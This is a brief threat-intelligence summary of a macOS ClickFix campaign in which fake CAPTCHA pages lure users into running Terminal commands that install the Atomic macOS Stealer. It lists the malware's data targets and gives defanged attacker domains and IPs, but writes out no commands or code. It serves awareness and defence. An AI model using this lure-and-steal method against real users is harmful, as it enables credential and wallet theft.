A new macOS ClickFix campaign uses fake CAPTCHA pages and Terminal commands to silently download and launch a malicious DMG that installs Atomic macOS Stealer (AMOS). The malware steals browser credentials, crypto wallet data, Keychain files, messaging app data, and documents, while the campaign uses servers such as svs-verificationdate[.]beer and 196.251.107[.]171. #AtomicmacOSStealer #AMOS #ClickFix #svs-verificationdate[.]beer
Keypoints
- Attackers use fake CAPTCHA pages to trick Mac users into running malicious Terminal commands.
- The command quietly downloads a DMG file and mounts it with macOS hdiutil.
- The payload installs Atomic macOS Stealer, also known as AMOS.
- AMOS targets browsers, cryptocurrency wallets, Telegram, Discord, Apple Notes, Safari cookies, and Keychain data.
- Stolen data is packaged into a ZIP archive and uploaded to attacker-controlled servers.